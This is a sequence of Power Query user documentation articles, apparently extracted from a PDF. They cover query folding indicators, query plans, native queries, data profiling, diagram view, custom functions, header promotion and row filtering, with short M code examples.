Query folding indicators use an underlying query plan, and require it to be able to get
information about the query to report it. Currently the query plan only supports tables,
so some cases (lists, records, primitives) won't report as folding or not. Similarly,
constant tables report as opaque.
Folding The folding indicator tells you that the query up to this step will be evaluated
by the data source.
Not The not-folding indicator tells you that some part of the query up to this step
folding will be evaluated outside the data source. You can compare it with the last
folding indicator, if there is one, to see if you can rearrange your query to be
more performant.
Might Might fold indicators are uncommon. They mean that a query "might" fold.
fold They indicate either that folding or not folding will be determined at runtime,
when pulling results from the query, and that the query plan is dynamic. These
indicators will likely only appear with ODBC or OData connections.
Opaque Opaque indicators tell you that the resulting query plan is inconclusive for
some reason. It generally indicates that there's a true "constant" table, or that
that transform or connector isn't supported by the indicators and query plan
tool.
Example analysis
For an example analysis, start by connecting to the Production.Product table in
Adventure Works (SQL). The initial load, similar to the example above, looks like the
following image.
Adding more steps that fold will extend that green line on the right side. This extension
occurs because this step also folds.
Adding a step that doesn't fold displays a different indicator. For example, Capitalize
each word never folds. The indicator changes, showing that as of this step, it's stopped
folding. As mentioned earlier, the previous steps will still fold.
Adding more steps downstream that depend on Capitalize each step will continue to
not fold.
However, if you remove the column you applied the capitalization to so that the
optimized query plan can all fold once more, you'll get a result like the following image.
However, something like this is uncommon. This image illustrates how it's not just the
order of steps, but the actual transformations that apply as well.
Query plan for Power Query (Preview)
Article • 02/17/2023
Query plan for Power Query is a feature that provides a better view of your query's
evaluation. It's useful to help determine why a particular query might not fold at a
particular step.
Through a practical example, this article will demonstrate the main use case and
potential benefits of using the query plan feature to review your query steps. The
examples used in this article have been created using the AdventureWorksLT sample
database for Azure SQL Server, which you can download from AdventureWorks sample
databases.
7 Note
The query plan feature for Power Query is only available in Power Query Online.
This article has been divided in a series of recommended steps in order to interpret the
query plan. These steps are:
Use the following steps to create the query in your own Power Query Online
environment.
Power Query M
let
Source = Sql.Database("servername", "database"),
Navigation = Source{[Schema = "Sales", Item = "SalesOrderHeader"]}
[Data],
#"Removed other columns" = Table.SelectColumns(Navigation,
{"SalesOrderID", "OrderDate", "SalesOrderNumber",
"PurchaseOrderNumber", "AccountNumber", "CustomerID", "TotalDue"}),
#"Filtered rows" = Table.SelectRows(#"Removed other columns", each
[TotalDue] > 1000),
#"Kept bottom rows" = Table.LastN(#"Filtered rows", 5)
in
#"Kept bottom rows"
3. Change servername and database with the correct names for your own
environment.
5. Select Next.
6. In the Power Query Editor, select Configure connection and provide the
credentials to your data source.
7 Note
After following these steps, your query will look like the one in the following image.
This query connects to the SalesOrderHeader table, and selects a few columns from the
last five orders with a TotalDue value above 1000.
7 Note
This article uses a simplified example to showcase this feature, but the concepts
described in this article apply to all queries. We recommend that you have a good
knowledge of query folding before reading the query plan. To learn more about
query folding, go to Query folding basics.
7 Note
Before reading this section, we recommend that you review the article on Query
folding indicators.
Your first step in this process is to review your query and pay close attention to the
query folding indicators. The goal is to review the steps that are marked as not folded.
Then you can see if making changes to the overall query could make those
transformations fold completely.
For this example, the only step that can't be folded is Kept bottom rows, which is easy
to identify through the not folded step indicator. This step is also the last step of the
query.
The goal now is to review this step and understand what's being folded back to the data
source and what can't be folded.
Power Query tries to optimize your query by taking advantage of lazy evaluation and
query folding, as mentioned in Query folding basics. This query plan represents the
optimized translation of your M query into the native query that's sent to the data
source. It also includes any transforms that are performed by the Power Query Engine.
The order in which the nodes appear follows the order of your query starting from the
last step or output of your query, which is represented on the far left of the diagram and
in this case is the Table.LastN node that represents the Kept bottom rows step.
At the bottom of the dialog, there's a bar with icons that help you zoom in or out of the
query plan view, and other buttons to help you manage the view. For the previous
image, the Fit to view option from this bar was used to better appreciate the nodes.
7 Note
The query plan represents the optimized plan. When the engine is evaluating a
query, it tries to fold all operators into a data source. In some cases, it might even
do some internal reordering of the steps to maximize folding. With this in mind, the
nodes/operators left in this optimized query plan typically contain the "folded" data
source query and any operators that couldn't be folded and are evaluated locally.
Folded nodes: This node can be either Value.NativeQuery or "data source" nodes
such as Sql.Database . These can also be identified with the label remote under
their function name.
Non-folded nodes: Other table operators, such as Table.SelectRows ,
Table.SelectColumns , and other functions that couldn't be folded. These can also
The following image shows the folded nodes inside the red rectangle. The rest of the
nodes couldn't be folded back to the data source. You'll need to review the rest of the
nodes since the goal is to attempt to have those nodes fold back to the data source.
You can select View details at the bottom of some nodes to display extended
information. For example, the details of the Value.NativeQuery node show the native
query (in SQL) that will be sent to the data source.
The query shown here might not be exactly the same query sent to the data source, but
it's a good approximation. For this case, it tells you exactly what columns will be queried
from the SalesOrderHeader table and then how it will filter that table using the TotalDue
field to only get rows where the value for that field is larger than 1000. The node next to
it, Table.LastN, is calculated locally by the Power Query engine, as it can't be folded.
7 Note
The operators might not exactly match the functions used in the query's script.
The goal is to apply changes to your query so that the step can be folded. Some of the
changes you might implement could range from rearranging your steps to applying an
alternative logic to your query that's more explicit to the data source. This doesn't mean
that all queries and all operations are foldable by applying some changes. But it's a
good practice to determine through trial and error if your query could be folded back.
Since the data source is a SQL Server database, if the goal is to retrieve the last five
orders from the table, then a good alternative would be to take advantage of the TOP
and ORDER BY clauses in SQL. Since there's no BOTTOM clause in SQL, the Table.LastN
transform in PowerQuery can't be translated into SQL. You could remove the
Table.LastN step and replace it with:
A sort descending step by the SalesOrderID column in the table, since this column
determines which order goes first and which has been entered last.
Select the top five rows since the table has been sorted, this transform
accomplishes the same as if it was a Kept bottom rows ( Table.LastN ).
This alternative is equivalent to the original query. While this alternative in theory seems
good, you need to make the changes to see if this alternative will make this node fully
fold back to the data source.
1. Close the query plan dialog and go back to the Power Query Editor.
4. Select the table icon on the top-left corner of the data preview view and select the
option that reads Keep top rows. In the dialog, pass the number five as the
argument and hit OK.
After implementing the changes, check the query folding indicators again and see if it's
giving you a folded indicator.
Now it's time to review the query plan of the last step, which is now Keep top rows.
Now there are only folded nodes. Select View details under Value.NativeQuery to verify
which query is being sent to the database.
While this article is suggesting what alternative to apply, the main goal is for you to
learn how to use the query plan to investigate query folding. This article also provides
visibility of what's being sent to your data source and what transforms will be done
locally.
You can adjust your code to see the impact that it has in your query. By using the query
folding indicators, you'll also have a better idea of which steps are preventing your
query from folding.
Query folding on native queries
Article • 02/17/2023
In Power Query, you're able to define a native query and run it against your data source.
The Import data from a database using native database query article explains how to do
this process with multiple data sources. But, by using the process described in that
article, your query won't take advantage of any query folding from subsequent query
steps.
This article showcases an alternative method to create native queries against your data
source using the Value.NativeQuery function and keep the query folding mechanism
active for subsequent steps of your query.
7 Note
We recommend that you read the documentation on query folding and the query
folding indicators to better understand the concepts used throughout this article.
Amazon Redshift
Dataverse (when using enhanced compute)
Google BigQuery
PostgreSQL
SAP HANA
Snowflake
SQL Server
7 Note
To showcase this process, this article uses the SQL Server connector and the
AdventureWorks2019 sample database. The experience may vary from connector
to connector, but this article showcases the fundamentals on how to enable query
folding capabilities over native queries for the supported connectors.
When connecting to the data source, it's important that you connect to the node or
level where you want to execute your native query. For the example in this article, that
node will be the database level inside the server.
After defining the connection settings and supplying the credentials for your
connection, you'll be taken to the navigation dialog for your data source. In that dialog,
you'll see all the available objects that you can connect to.
From this list, you need to select the object where the native query is run (also known as
the target). For this example, that object is the database level.
At the navigator window in Power Query, right-click the database node in the navigator
window and select the Transform Data option. Selecting this option creates a new query
of the overall view of your database, which is the target you need to run your native
query.
Once your query lands in the Power Query editor, only the Source step should show in
the Applied steps pane. This step contains a table with all the available objects in your
database, similar to how they were displayed in the Navigator window.
SQL
The first step was to define the correct target, which in this case is the database where
the SQL code will be run. Once a step has the correct target, you can select that step—in
this case, Source in Applied Steps—and then select the fx button in the formula bar to
add a custom step. In this example, replace the Source formula with the following
formula:
Power Query M
The most important component of this formula is the use of the optional record for the
forth parameter of the function that has the EnableFolding record field set to true.
7 Note
You can read more about the Value.NativeQuery function from the official
documentation article.
After you have entered the formula, a warning will be shown that will require you to
enable native queries to run for your specific step. You can click continue for this step to
be evaluated.
This SQL statement yields a table with only three rows and two columns.
Test query folding
To test the query folding of your query, you can try to apply a filter to any of your
columns and see if the query folding indicator in the applied steps section shows the
step as folded. For this case, you can filter the DepartmentID column to have values that
are not equal to two.
After adding this filter, you can check that the query folding indicators still show the
query folding happening at this new step.
To further validate what query is being sent to the data source, you can right-click the
Filtered rows step and select the option that reads View query plan to check the query
plan for that step.
In the query plan view, you can see that a node with the name Value.NativeQuery at the
left side of the screen that has a hyperlink text that reads View details. You can click this
hyperlink text to view the exact query that is being sent to the SQL Server database.
The native query is wrapped around another SELECT statement to create a subquery of
the original. Power Query will do its best to create the most optimal query given the
transforms used and the native query provided.
Tip
For scenarios where you get errors because query folding wasn't possible, it is
recommended that you try validating your steps as a subquery of your original
native query to check if there might be any syntax or context conflicts.
Using the data profiling tools
Article • 08/14/2023
The data profiling tools provide new and intuitive ways to clean, transform, and
understand data in Power Query Editor. They include:
Column quality
Column distribution
Column profile
To enable the data profiling tools, go to the View tab on the ribbon. In Power Query
Desktop, enable the options you want in the Data preview group, as shown in the
following image.
In Power Query Online, select Data view, then enable the options you want in the drop-
down list.
After you enable the options, you'll see something like the following image in Power
Query Editor.
7 Note
By default, Power Query performs this data profiling over the first 1,000 rows of
your data. To have it operate over the entire dataset, select the Column profiling
based on top 1000 rows message in the lower-left corner of your editor window to
change column profiling to Column profiling based on entire dataset.
Column quality
The column quality feature labels values in rows in five categories:
Unknown, shown in dashed green. Indicates when there are errors in a column, the
quality of the remaining data is unknown.
These indicators are displayed directly underneath the name of the column as part of a
small bar chart, as shown in the following image.
The number of records in each column quality category is also displayed as a
percentage.
By hovering over any of the columns, you are presented with the numerical distribution
of the quality of values throughout the column. Additionally, selecting the ellipsis button
(...) opens some quick action buttons for operations on the values.
Column distribution
This feature provides a set of visuals underneath the names of the columns that
showcase the frequency and distribution of the values in each of the columns. The data
in these visualizations is sorted in descending order from the value with the highest
frequency.
By hovering over the distribution data in any of the columns, you get information about
the overall data in the column (with distinct count and unique values). You can also
select the ellipsis button and choose from a menu of available operations.
Column profile
This feature provides a more in-depth look at the data in a column. Apart from the
column distribution chart, it contains a column statistics chart. This information is
displayed underneath the data preview section, as shown in the following image.
Filter by value
You can interact with the value distribution chart on the right side and select any of the
bars by hovering over the parts of the chart.
Copy data
In the upper-right corner of both the column statistics and value distribution sections,
you can select the ellipsis button (...) to display a Copy shortcut menu. Select it to copy
the data displayed in either section to the clipboard.
Group by value
When you select the ellipsis button (...) in the upper-right corner of the value
distribution chart, in addition to Copy you can select Group by. This feature groups the
values in your chart by a set of available options.
The image below shows a column of product names that have been grouped by text
length. After the values have been grouped in the chart, you can interact with individual
values in the chart as described in Filter by value.
Using the Queries pane
Article • 02/17/2023
In Power Query, you'll be creating many different queries. Whether it be from getting
data from many tables or from duplicating the original query, the number of queries will
increase.
7 Note
Some actions in the Power Query Online editor may be different than actions in the
Power Query Desktop editor. These differences will be noted in this article.
Rename a query
To directly change the name of the query, double-select on the name of the query. This
action will allow you to immediately change the name.
Go to Query Settings and enter in a different name in the Name input field.
Delete a query
To delete a query, open the context pane on the query and select Delete. There will be
an additional pop-up confirming the deletion. To complete the deletion, select the
Delete button.
Duplicating a query
Duplicating a query will create a copy of the query you're selecting.
To duplicate your query, open the context pane on the query and select Duplicate. A
new duplicate query will pop up on the side of the query pane.
Referencing a query
Referencing a query will create a new query. The new query uses the steps of a previous
query without having to duplicate the query. Additionally, any changes on the original
query will transfer down to the referenced query.
To reference your query, open the context pane on the query and select Reference. A
new referenced query will pop up on the side of the query pane.
7 Note
To learn more about how to copy and paste queries in Power Query, go to Sharing
a query.
For the sake of being more comprehensive, we'll once again describe all of the context
menu actions that are relevant for either.
New query
You can import data into the Power Query editor as an option from the context menu.
To learn about how to get data into Power Query, go to Getting data
Merge queries
When you select the Merge queries option from the context menu, the Merge queries
input screen opens.
This option functions the same as the Merge queries feature located on the ribbon and
in other areas of the editor.
7 Note
To learn more about how to use the Merge queries feature, go to Merge queries
overview.
New parameter
When you select the New parameter option from the context menu, the New
parameter input screen opens.
This option functions the same as the New parameter feature located on the ribbon.
7 Note
To move the query into a group, open the context menu on the specific query.
Then, select the group you want to put the query in.
The move will look like the following image. Using the same steps as above, you can
also move the query out of the group by selecting Queries (root) or another group.
In desktop versions of Power Query, you can also drag and drop the queries into the
folders.
Diagram view
Article • 02/17/2023
Diagram view offers a visual way to prepare data in the Power Query editor. With this
interface, you can easily create queries and visualize the data preparation process.
Diagram view simplifies the experience of getting started with data wrangling. It speeds
up the data preparation process and helps you quickly understand the dataflow, both
the "big picture view" of how queries are related and the "detailed view" of the specific
data preparation steps in a query.
This feature is enabled by selecting Diagram view in the View tab on the ribbon. With
diagram view enabled, the steps pane and queries pane will be collapsed.
7 Note
Diagram view is also connected to the Data Preview and the ribbon so that you can
select columns in the Data Preview.
You can add a new step within a query, after the currently selected step, by selecting the
+ button, and then either search for the transform or choose the item from the shortcut
menu. These are the same transforms you'll find in the Power Query editor ribbon.
By searching and selecting the transform from the shortcut menu, the step gets added
to the query, as shown in the following image.
7 Note
To learn more about how to author queries in the Query editor using the Power
Query editor ribbon or data preview, go to Power Query Quickstart.
Query level actions
You can perform two quick actions on a query—expand/collapse a query and highlight
related queries. These quick actions show up on an active selected query or when
hovering over a query.
You can perform more query level actions such as duplicate, reference, and so on, by
selecting the query level context menu (the three vertical dots). You can also right-click
in the query and get to the same context menu.
Delete query
To delete a query, right-click in a query and select Delete from the context menu. There
will be an additional pop-up to confirm the deletion.
Rename query
To rename a query, right-click in a query and select Rename from the context menu.
Enable load
To ensure that the results provided by the query are available for downstream use such
as report building, by default Enable load is set to true. In case you need to disable load
for a given query, right-click in a query and select Enable load. The queries where
Enable load is set to false will be displayed with a grey outline.
Duplicate
To create a copy of a given query, right-click in the query and select Duplicate. A new
duplicate query will appear in the diagram view.
Reference
Referencing a query will create a new query. The new query will use the steps of the
previous query without having to duplicate the query. Additionally, any changes on the
original query will transfer down to the referenced query. To reference a query, right-
click in the query and select Reference.
Move to group
You can make folders and move the queries into these folders for organizational
purposes. These folders are called groups. To move a given query to a Query group,
right-click in a query and select Move to group. You can choose to move the queries to
an existing group or create a new query group.
You can view the query groups above the query box in the diagram view.
Create function
When you need to apply the same set of transformations in different queries or values,
creating custom Power Query functions can be valuable. To learn more about custom
functions, go to Using custom functions. To convert a query into a reusable function,
right-click in a given query and select Create function.
Convert to parameter
A parameter provides the flexibility to dynamically change the output of your queries
depending on their value and promotes reusability. To convert a non-structured value
such as date, text, number, and so on, right-click in the query and select Convert to
Parameter.
7 Note
Advanced editor
With the advanced editor, you can see the code that Power Query editor is creating with
each step. To view the code for a given query, right-click in the query and select
Advanced editor.
7 Note
To learn more about the code used in the advanced editor, go to Power Query M
language specification.
7 Note
7 Note
To learn more about how to merge queries in Power Query, go to Merge queries
overview.
Edit settings
To edit the step level settings, right-click the step and choose Edit settings. Instead, you
can double-click the step (that has step settings) and directly get to the settings dialog
box. In the settings dialog box, you can view or change the step level settings. For
example, the following image shows the settings dialog box for the Split column step.
Rename step
To rename a step, right-click the step and select Rename. This action opens the Step
properties dialog. Enter the name you want, and then select OK.
Delete step
To delete a step, right-click the step and select Delete. To delete a series of steps until
the end, right-click the step and select Delete until end.
This action will open a dialog box where you can add the step description. This step
description will come handy when you come back to the same query after a few days or
when you share your queries or dataflows with other users.
By hovering over each step, you can view a call out that shows the step label, step name,
and step descriptions (that were added).
By selecting each step, you can see the corresponding data preview for that step.
You can also expand or collapse a query by selecting the query level actions from the
query's context menu.
To expand all or collapse all queries, select the Expand all/Collapse all button next to
the layout options in the diagram view pane.
You can also right-click any empty space in the diagram view pane and see a context
menu to expand all or collapse all queries.
In the collapsed mode, you can quickly look at the steps in the query by hovering over
the number of steps in the query. You can select these steps to navigate to that specific
step within the query.
Layout Options
There are five layout options available in the diagram view: zoom out, zoom in, mini-
map, full screen, fit to view, and reset.
Zoom out/zoom in
With this option, you can adjust the zoom level and zoom out or zoom in to view all the
queries in the diagram view.
Mini-map
With this option, you can turn the diagram view mini-map on or off. More information:
Show mini-map
Full screen
With this option, you can view all the queries and their relationships through the Full
screen mode. The diagram view pane expands to full screen and the data preview pane,
queries pane, and steps pane remain collapsed.
Fit to view
With this option, you can adjust the zoom level so that all the queries and their
relationships can be fully viewed in the diagram view.
Reset
With this option, you can reset the zoom level back to 100% and also reset the pane to
the top-left corner.
Similarly, you can select the right dongle to view direct and indirect dependent queries.
You can also hover on the link icon below a step to view a callout that shows the query
relationships.
The second way to modify diagram view settings is to right-click over a blank part of the
diagram view background.
You can change diagram view settings to show step names to match the applied steps
within the query settings pane.
Compact view
When you have queries with multiple steps, it can be challenging to scroll horizontally to
view all your steps within the viewport.
To address this, diagram view offers Compact view, which compresses the steps from
top to bottom instead of left to right. This view can be especially useful when you have
queries with multiple steps, so that you can see as many queries as possible within the
viewport.
To enable this view, navigate to diagram view settings and select Compact view inside
the View tab in the ribbon.
Show mini-map
Once the number of queries begin to overflow the diagram view, you can use the scroll
bars at the bottom and right side of the diagram view to scroll through the queries. One
other method of scrolling is to use the diagram view mini-map control. The mini-map
control lets you keep track of the overall dataflow "map", and quickly navigate, while
looking at an specific area of the map in the main diagram view area.
To open the mini-map, either select Show mini-map from the diagram view menu or
select the mini-map button in the layout options.
Right-click and hold the rectangle on the mini-map, then move the rectangle to move
around in the diagram view.
Show animations
When the Show animations menu item is selected, the transitions of the sizes and
positions of the queries is animated. These transitions are easiest to see when collapsing
or expanding the queries or when changing the dependencies of existing queries. When
cleared, the transitions will be immediate. Animations are turned on by default.
You can also expand or collapse related queries from the query level context menu.
Multi-select queries
You select multiple queries within the diagram view by holding down the Ctrl key and
clicking queries. Once you multi-select, right-clicking will show a context menu that
allows performing operations such as merge, append, move to group, expand/collapse
and more.
Inline rename
You can double-click the query name to rename the query.
Double-clicking the step name allows you to rename the step, provided the diagram
view setting is showing step names.
When step labels are displayed in diagram view, double-clicking the step label shows
the dialog box to rename the step name and provide a description.
Accessibility
Diagram view supports accessibility features such as keyboard navigation, high-contrast
mode, and screen reader support. The following table describes the keyboard shortcuts
that are available within diagram view. To learn more about keyboard shortcuts available
within Power Query Online, go to keyboard shortcuts in Power Query.
Move focus from query level to step level Alt+Down arrow key
Schema view is designed to optimize your flow when working on schema level
operations by putting your query's column information front and center. Schema view
provides contextual interactions to shape your data structure, and lower latency
operations as it only requires the column metadata to be computed and not the
complete data results.
This article walks you through schema view and the capabilities it offers.
7 Note
The Schema view feature is available only for Power Query Online.
Overview
When working on data sets with many columns, simple tasks can become incredibly
cumbersome because even finding the right column by horizontally scrolling and
parsing through all the data is inefficient. Schema view displays your column
information in a list that's easy to parse and interact with, making it easier than ever to
work on your schema.
In addition to an optimized column management experience, another key benefit of
schema view is that transforms tend to yield results faster. These results are faster
because this view only requires the columns information to be computed instead of a
preview of the data. So even working with long running queries with a few columns will
benefit from using schema view.
You can turn on schema view by selecting Schema view in the View tab. When you're
ready to work on your data again, you can select Data view to go back.
Reordering columns
One common task when working on your schema is reordering columns. In Schema
View this can easily be done by dragging columns in the list and dropping in the right
location until you achieve the desired column order.
Applying transforms
For more advanced changes to your schema, you can find the most used column-level
transforms right at your fingertips directly in the list and in the Schema tools tab. Plus,
you can also use transforms available in other tabs on the ribbon.
Share a query
Article • 12/17/2022
You can use Power Query to extract and transform data from external data sources.
These extraction and transformations steps are represented as queries. Queries created
with Power Query are expressed using the M language and executed through the M
Engine.
You can easily share and reuse your queries across projects, and also across Power
Query product integrations. This article covers the general mechanisms to share a query
in Power Query.
Copy / Paste
In the queries pane, right-click the query you want to copy. From the dropdown menu,
select the Copy option. The query and its definition will be added to your clipboard.
7 Note
The copy feature is currently not available in Power Query Online instances.
To paste the query from your clipboard, go to the queries pane and right-click on any
empty space in it. From the menu, select Paste.
When pasting this query on an instance that already has the same query name, the
pasted query will have a suffix added with the format (#) , where the pound sign is
replaced with a number to distinguish the pasted queries.
You can also paste queries between multiple instances and product integrations. For
example, you can copy the query from Power BI Desktop, as shown in the previous
images, and paste it in Power Query for Excel as shown in the following image.
2 Warning
Copying and pasting queries between product integrations doesn't guarantee that
all functions and functionality found in the pasted query will work on the
destination. Some functionality might only be available in the origin product
integration.
With the code of your query in your clipboard, you can share this query through the
means of your choice. The recipient of this code needs to create a blank query and
follow the same steps as described above. But instead of copying the code, the recipient
will replace the code found in their blank query with the code that you provided.
7 Note
To create a blank query, go to the Get Data window and select Blank query from
the options.
If you find yourself in a situation where you need to apply the same set of
transformations to different queries or values, creating a Power Query custom function
that can be reused as many times as you need could be beneficial. A Power Query
custom function is a mapping from a set of input values to a single output value, and is
created from native M functions and operators.
While you can manually create your own Power Query custom function using code as
shown in Understanding Power Query M functions, the Power Query user interface
offers you features to speed up, simplify, and enhance the process of creating and
managing a custom function.
This article focuses on this experience, provided only through the Power Query user
interface, and how to get the most out of it.
) Important
This article outlines how to create a custom function with Power Query using
common transforms accessible in the Power Query user interface. It focuses on the
core concepts to create custom functions, and links to additional articles in Power
Query documentation for more information on specific transforms that are
referenced in this article.
7 Note
The following example was created using the desktop experience found in Power BI
Desktop and can also be followed using the Power Query experience found in Excel
for Windows.
You can follow along with this example by downloading the sample files used in this
article from the following download link . For simplicity, this article will be using the
Folder connector. To learn more about the Folder connector, go to Folder. The goal of
this example is to create a custom function that can be applied to all the files in that
folder before combining all of the data from all files into a single table.
Start by using the Folder connector experience to navigate to the folder where your files
are located and select Transform Data or Edit. This will take you to the Power Query
experience. Right-click on the Binary value of your choice from the Content field and
select the Add as New Query option. For this example, you'll see that the selection was
made for the first file from the list, which happens to be the file April 2019.csv.
This option will effectively create a new query with a navigation step directly to that file
as a Binary, and the name of this new query will be the file path of the selected file.
Rename this query to be Sample File.
Create a new parameter with the name File Parameter. Use the Sample File query as the
Current Value, as shown in the following image.
7 Note
We recommend that you read the article on Parameters to better understand how
to create and manage parameters in Power Query.
The binary parameter type is only displayed inside the Parameters dialog Type
dropdown menu when you have a query that evaluates to a binary.
Rename the newly created query from File Parameter (2) to Transform Sample file.
Right-click this new Transform Sample file query and select the Create Function option.
This operation will effectively create a new function that will be linked with the
Transform Sample file query. Any changes that you make to the Transform Sample file
query will be automatically replicated to your custom function. During the creation of
this new function, use Transform file as the Function name.
After creating the function, you'll notice that a new group will be created for you with
the name of your function. This new group will contain:
All parameters that were referenced in your Transform Sample file query.
Your Transform Sample file query, commonly known as the sample query.
Your newly created function, in this case Transform file.
The first transformation that needs to happen to this query is one that will interpret the
binary. You can right-click the binary from the preview pane and select the CSV option
to interpret the binary as a CSV file.
The format of all the CSV files in the folder is the same. They all have a header that
spans the first top four rows. The column headers are located in row five and the data
starts from row six downwards, as shown in the next image.
The next set of transformation steps that need to be applied to the Transform Sample
file are:
1. Remove the top four rows—This action will get rid of the rows that are considered
part of the header section of the file.
7 Note
To learn more about how to remove rows or filter a table by row position, go
to Filter by row position.
2. Promote headers—The headers for your final table are now in the first row of the
table. You can promote them as shown in the next image.
Power Query by default will automatically add a new Changed Type step after
promoting your column headers that will automatically detect the data types for each
column. Your Transform Sample file query will look like the next image.
7 Note
Your Transform file function relies on the steps performed in the Transform
Sample file query. However, if you try to manually modify the code for the
Transform file function, you'll be greeted with a warning that reads The definition
of the function 'Transform file' is updated whenever query 'Transform Sample
file' is updated. However, updates will stop if you directly modify function
'Transform file'.
7 Note
To learn more about how to choose or remove columns from a table, go to Choose
or remove columns.
Your function was applied to every single row from the table using the values from the
Content column as the argument for your function. Now that the data has been
transformed into the shape that you're looking for, you can expand the Output Table
column, as shown in the image below, without using any prefix for the expanded
columns.
You can verify that you have data from all files in the folder by checking the values in the
Name or Date column. For this case, you can check the values from the Date column, as
each file only contains data for a single month from a given year. If you see more than
one, it means that you've successfully combined data from multiple files into a single
table.
7 Note
What you've read so far is fundamentally the same process that happens during the
Combine files experience, but done manually.
We recommend that you also read the article on Combine files overview and
Combine CSV files to further understand how the combine files experience works
in Power Query and the role that custom functions play.
To make this requirement happen, create a new parameter called Market with the text
data type. For the Current Value, enter the value Panama.
With this new parameter, select the Transform Sample file query and filter the Country
field using the value from the Market parameter.
7 Note
Applying this new step to your query will automatically update the Transform file
function, which will now require two parameters based on the two parameters that your
Transform Sample file uses.
But the CSV files query has a warning sign next to it. Now that your function has been
updated, it requires two parameters. So the step where you invoke the function results
in error values, since only one of the arguments was passed to the Transform file
function during the Invoked Custom Function step.
To fix the errors, double-click Invoked Custom Function in the Applied Steps to open
the Invoke Custom Function window. In the Market parameter, manually enter the
value Panama.
You can now check your query to validate that only rows where Country is equal to
Panama show up in the final result set of the CSV Files query.
For example, imagine a query that has several codes as a text string and you want to
create a function that will decode those values, as in the following sample table:
code
PTY-CM1090-LAX
code
LAX-CM701-PTY
PTY-CM4441-MIA
MIA-UA1257-LAX
LAX-XY2842-MIA
You start by having a parameter that has a value that serves as an example. For this case,
it will be the value PTY-CM1090-LAX.
From that parameter, you create a new query where you apply the transformations that
you need. For this case, you want to split the code PTY-CM1090-LAX into multiple
components:
Origin = PTY
Destination = LAX
Airline = CM
FlightID = 1090
The M code for that set of transformations is shown below.
Power Query M
let
Source = code,
SplitValues = Text.Split( Source, "-"),
CreateRow = [Origin= SplitValues{0}, Destination= SplitValues{2},
Airline=Text.Start( SplitValues{1},2), FlightID= Text.End( SplitValues{1},
Text.Length( SplitValues{1} ) - 2) ],
RowToTable = Table.FromRecords( { CreateRow } ),
#"Changed Type" = Table.TransformColumnTypes(RowToTable,{{"Origin", type
text}, {"Destination", type text}, {"Airline", type text}, {"FlightID", type
text}})
in
#"Changed Type"
7 Note
To learn more about the Power Query M formula language, go to Power Query M
formula language.
You can then transform that query into a function by doing a right-click on the query
and selecting Create Function. Finally, you can invoke your custom function into any of
your queries or values, as shown in the next image.
After a few more transformations, you can see that you've reached your desired output
and leveraged the logic for such a transformation from a custom function.
Promote or demote column headers
Article • 12/17/2022
When creating a new query from unstructured data sources such as text files, Power
Query analyzes the contents of the file. If Power Query identifies a different pattern for
the first row, it will try to promote the first row of data to be the column headings for
your table. However, Power Query might not identify the pattern correctly 100 percent
of the time, so this article explains how you can manually promote or demote column
headers from rows.
Before you can promote the headers, you need to remove the first four rows of the
table. To make that happen, select the table menu in the upper-left corner of the
preview window, and then select Remove top rows.
In the Remove top rows window, enter 4 in the Number of rows box.
7 Note
To learn more about Remove top rows and other table operations, go to Filter by
row position.
The result of that operation will leave the headers as the first row of your table.
Locations of the promote headers operation
From here, you have a number of places where you can select the promote headers
operation:
7 Note
Table column names must be unique. If the row you want to promote to a header
row contains multiple instances of the same text string, Power Query will
disambiguate the column headings by adding a numeric suffix preceded by a dot
to every text string that isn't unique.
To demote column headers to rows
In the following example, the column headers are incorrect: they're actually part of the
table's data. You need to demote the headers to be part of the rows of the table.
After you do this operation, your table will look like the following image.
As a last step, select each column and type a new name for it. The end result will
resemble the following image.
See also
Filter by row position
Filter a table by row position
Article • 12/17/2022
Power Query has multiple options to filter a table based on the positions of its rows,
either by keeping or removing those rows. This article covers all the available methods.
Keep rows
The keep rows set of functions will select a set of rows from the table and remove any
other rows that don't meet the criteria.
There are two places where you can find the Keep rows buttons:
In the data preview section in the middle of the Power Query window, you can see
the position of your rows on the left side of the table. Each row position is
represented by a number. The top row starts with position 1.
The result of that change will give you the output table you're looking for. After you set
the data types for your columns, your table will look like the following image.
Keep bottom rows
Imagine the following table that comes out of a system with a fixed layout.
This report always contains seven rows of data at the end of the report page. Above the
data, the report has a section for comments with an unknown number of rows. In this
example, you only want to keep those last seven rows of data and the header row.
To do that, select Keep bottom rows from the table menu. In the Keep bottom rows
dialog box, enter 8 in the Number of rows box.
The result of that operation will give you eight rows, but now your header row is part of
the table.
You need to promote the column headers from the first row of your table. To do this,
select Use first row as headers from the table menu. After you define data types for
your columns, you'll create a table that looks like the following image.
To do that, select Keep range of rows from the table menu. In the Keep range of rows
dialog box, enter 6 in the First row box and 8 in the Number of rows box.
Similar to the previous example for keeping bottom rows, the result of this operation
gives you eight rows with your column headers as part of the table. Any rows above the
First row that you defined (row 6) are removed.
You can perform the same operation as described in Keep bottom rows to promote the
column headers from the first row of your table. After you set data types for your
columns, your table will look like the following image.
Remove rows
This set of functions will select a set of rows from the table, remove them, and keep the
rest of the rows in the table.
There are two places where you can find the Remove rows buttons:
To do that, select Remove top rows from the table menu. In the Remove top rows
dialog box, enter 5 in the Number of rows box.
In the same way as the previous examples for "Keep bottom rows" and "Keep a range of
rows," the result of this operation gives you eight rows with your column headers as part
of the table.
You can perform the same operation as described in previous examples to promote the
column headers from the first row of your table. After you set data types for your
columns, your table will look like the following image.
Remove bottom rows
Imagine the following table that comes out of a system with a fixed layout.
This report always contains a fixed section or footer that occupies the last five rows of
the table. In this example, you want to remove those last five rows and keep the rest of
the data.
To do that, select Remove bottom rows from the table menu. In the Remove top rows
dialog box, enter 5 in the Number of rows box.
The result of that change will give you the output table that you're looking for. After you
set data types for your columns, your table will look like the following image.
Remove alternate rows
Imagine the following table that comes out of a system with a dynamic layout.
The way this report is structured is that you have elements in pairs of rows. Every odd
row (1, 3, 5...) contains the data that you need. Every even row, directly underneath each
odd row, contains comments about each of those records. You don't need the
comments, and you want to remove all of them.
To do that, select Remove alternate rows from the table menu. In the Remove alternate
rows dialog box, enter the following values:
Here you start defining the pattern for removing rows. After you find the second
row, you only want to remove that specific row, so you specify that you only need
to remove one row.
After you remove one row, you keep the next row. The process starts again for the
next row.
The result of that selection will give you the output table that you're looking for. After
you set the data types to your columns, your table will look like the following image.
Filter by values in a column
Article • 12/17/2022
In Power Query, you can include or exclude rows according to a specific value in a
column. You can choose from three methods to filter the values in your column:
After you apply a filter to a column, a small filter icon appears in the column heading, as
shown in the following illustration.
In this article, we'll focus on aspects related to filtering data. To learn more about
the sort options and how to sort columns in Power Query, go to Sort columns.
Remove empty
